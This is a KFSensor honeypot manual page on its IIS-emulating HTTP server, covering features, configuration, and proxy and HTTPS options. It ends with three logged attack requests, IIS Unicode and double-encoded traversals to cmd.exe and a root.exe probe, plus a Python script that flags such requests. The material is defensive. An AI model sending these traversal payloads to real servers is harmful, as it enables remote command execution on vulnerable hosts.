KFSensor

 

Edit Sim Std Server - HTTP

Use the Edit Sim Std Server - HTTP dialog box to add or edit an HTTP definition.

You will find a description of what Sim Std Servers are here.

An HTTP server is another name for a web server.

Emulation Features

The HTTP Sim Server is the most complex and fully featured of all the sim servers. It is a fully working web server that correctly emulates Microsoft's IIS web server.

Great effort has been made to return the exact response messages that IIS returns in all circumstances, to provide the best possible emulation and reduce the chance of the visitor detecting that they are not visiting a real web server.

This sim server can be used to host a web site. A basic set of files is included with KFSensor that makes the server appear to be a default Microsoft IIS configuration. You can replace these files with your own HTML and image files to make the honeypot more realistic.

Microsoft IIS can be configured in many different ways.
KFSensor emulates the following restrictive IIS configuration:

  • Disable HTTP Keep-Alives
    Limits visitor to one request per connection
  • No Execute permission
    Scripts and CGI cannot be executed
  • No ISAPI filters
    These are extensions to IIS which have often been prone to vulnerabilities in the past
  • No directory browsing
    The server will not produce an index page if a directory is requested. Index files are supported
  • No write permission
    Visitors are not allowed to change the website contents
  • Default Error messages
    IIS can return a custom error page for each type of error. Only default errors are emulated


Here are some of the features KFSensor implements to provide an accurate emulation of IIS:

  • Error messages
    IIS returns different error descriptions depending on the error, even for the same response code
  • Response headers
    Correct values are returned for the headers contained in the server's response. As well as the common ones, like "Content-Length", the more complex ones are also supported, such as "Content-Location", "Last-Modified", "Content-Range" and "ETag"
  • Header Order
    Each web server is free to return the response headers in any order. IIS is inconsistent in the way that it orders these headers. For example, sometimes it returns "Content-Length" as the first header and sometimes as the last header. KFSensor matches these different header orders
  • If-Modified
    KFSensor supports browser side caching
  • Range Requests
    By using the Range header a visitor can request specified parts of a file
  • HTTP Verbs
    OPTIONS, TRACE, GET, HEAD, POST all handled correctly
  • Fragmentation
    A request can be split into many packets as a way of avoiding detection by signature based IDS. KFSensor correctly handles fragmentation


The following are some of the checks and restrictions that KFSensor implements to provide a secure emulation of IIS:

  • Restricted Extensions
    Only files with certain common extensions will be returned. For example .xls, .doc and .exe will never be returned even if they are in the web document directory.
  • No CGI
    KFSensor does not attempt to run an external executable or DLL
  • Buffer overflows
    Dynamic buffers are used throughout to prevent buffer overflows and many additional checks are made.
  • Unicode attacks
    CodeRed style double-encoding is checked for
  • Directory walking
    Tricks like /../ and /.../ are checked for

HTTP Proxy Server

This sim server also supports HTTP proxy server requests: CONNECT and proxy URLs.

Incorrectly configured HTTP proxy servers are used by people to surf anonymously and to access other non-HTTP services.

For more information on this aspect of the server and how to configure it see the KFSensor Proxy Server emulation section in the KFSensor Administration Guide.

Configuration

Title

  • Name
    Each Sim Std Server requires a unique name, which is used to identify it.
  • Description
    A piece of text for notes on what the Sim Std Server aims to support
  • Default Port
    Most services have standard ports on which visitors expect to find them.
    The default port for HTTP is 80.
    This is only used as a prompt during configuration of a Listen; a Sim Std Server can be set on any or many different ports.
  • Severity
    The severity level that events generated by this Sim Std Server will be given. This can be changed or overridden as part of the Listen configuration.

Options

These settings control how this Sim Std Server responds to a visitor.
  • Emulation
    The real server that is emulated.
    Nb. At present only the Microsoft IIS server is emulated.
  • Version
    A web server returns a header called "Server", as part of its response, that identifies the make and version number of the HTTP server.
    Setting this value allows you to control the value that is returned to the visitor in this header.
  • Document Root
    This is the path on the local machine of the web server's root directory.
    Files in this directory and any sub directories will be available for visitors to download.
    If this value is blank then the downloading of files will be disabled.
    Take care when changing this setting as it could expose private files on your system to a visitor if not properly configured.
    The path can be either relative or absolute. A relative path is considered to be relative to the KFSensor's installation directory. e.g. "files\iis\wwwroot" will be considered "C:\Program Files\KeyFocus\KFSensor\files\iis\wwwroot".
  • Index Files
    If a visitor requests a directory instead of a file then the server will attempt to locate a suitable index file to be automatically returned instead of a not found error. This value contains a list of files that should be selected as index files. Each file name should be separated by a single space.
  • Require Basic Authorization
    If this option is checked then the visitor will receive an Unauthorized response. If they are using a browser they will be prompted for a user name and password. All attempts to log on will be rejected and the sim server will not allow any files to be returned to the user.
  • Time out
    The time in seconds that the KFSensor server allows the session to continue for before closing the connection.
  • Idle Time out
    The time in seconds that the KFSensor server will wait for traffic on a connection before closing the connection.
  • Receive limit
    The maximum number of bytes that will be accepted from the visitor before the connection is closed.
  • Log response lines
    If set to a value greater than zero then a response will be truncated to the specified number of lines when it is recorded in the log.
  • Log response size
    If set to a value greater than zero then a response will be truncated to the specified number of bytes when it is recorded in the log.
  • Log receive size
    If set to a value greater than zero then received data will be truncated to the specified number of bytes when it is recorded in the log.

HTTPS Secure Connection Options

The HTTP simulated server supports HTTPS as well as HTTP. This allows visitors to interact with TCP port 443 using encrypted TLS traffic as they would expect on that port.

KFSensor will dynamically generate a self-signed certificate for use by the HTTPS simulated service. It is also possible for the simulated server to use a real certificate that has been added to the local Windows certificate store.

Proxy emulation

See the KFSensor Proxy Server emulation section in the KFSensor Administration Guide for more details.
  • HTTP proxy
  • CONNECT proxy

Buttons

Example Attacks

The following are real life examples of attacks on an HTTP Sim Std Server.

GET /_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Sat, 10 May 2003 12:00:02 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the path specified.
</body></html>


GET /scripts/root.exe?/c+dir+c:\ HTTP/1.0
Host: www
HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Sat, 10 May 2003 12:05:01 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the path specified.
</body></html>


GET /_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Sat, 10 May 2003 12:05:00 GMT
Connection: close
Content-Length: 34

<h1>Bad Request (Invalid URL)</h1>
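
The checks listed under the secure emulation features (restricted extensions, double-encoding, directory walking) can also be applied when triaging logged requests such as the three above. The following is an added example, not KFSensor's own code: the allow-list of extensions, the finding names and the lenient decoder model are assumptions, and the last two sample lines are constructed.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Request lines copied from the examples on this page, plus two constructed benign ones.
SAMPLE_REQUESTS = [
    r"GET /_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0",
    r"GET /scripts/root.exe?/c+dir+c:\ HTTP/1.0",
    r"GET /_vti_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0",
    "GET /index.htm HTTP/1.0",          # constructed
    "GET /docs/a%2520b.htm HTTP/1.0",   # constructed: double-encoded space
]
# Assumed allow-list; the page only says .xls, .doc and .exe are never returned.
ALLOWED_EXT = {".htm", ".html", ".gif", ".jpg", ".png", ".css", ".txt"}


def lenient_fold(raw: bytes) -> bytes:
    """Assumed model of a decoder that accepts 0xC0/0xC1 lead bytes unvalidated."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((raw[i] & 0x01) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)


def classify(request_line: str) -> list:
    """Return the sorted findings for one logged request line."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return ["malformed-request-line"]
    path = parts[1].split("?", 1)[0]
    once = unquote_to_bytes(path)
    findings = set()
    if unquote_to_bytes(once) != once:
        findings.add("double-encoding")          # a second decode pass still changes it
    if b"\xc0" in once or b"\xc1" in once:
        findings.add("invalid-utf8-lead-byte")   # 0xC0/0xC1 never occur in valid UTF-8
    folded = lenient_fold(unquote_to_bytes(once)).decode("latin-1")
    segments = folded.replace("\\", "/").lower().split("/")
    if any(len(s) >= 2 and set(s) == {"."} for s in segments):
        findings.add("directory-walking")        # "..", "..." after full normalization
    ext = posixpath.splitext(segments[-1])[1]
    if ext and ext not in ALLOWED_EXT:
        findings.add("extension-not-allowed")
    return sorted(findings)


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line) or ["clean"], line)
```

In the third request the dot segments only become visible after the lenient fold turns each %c1%1c pair into a backslash, which is why normalization runs before the directory-walking check.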
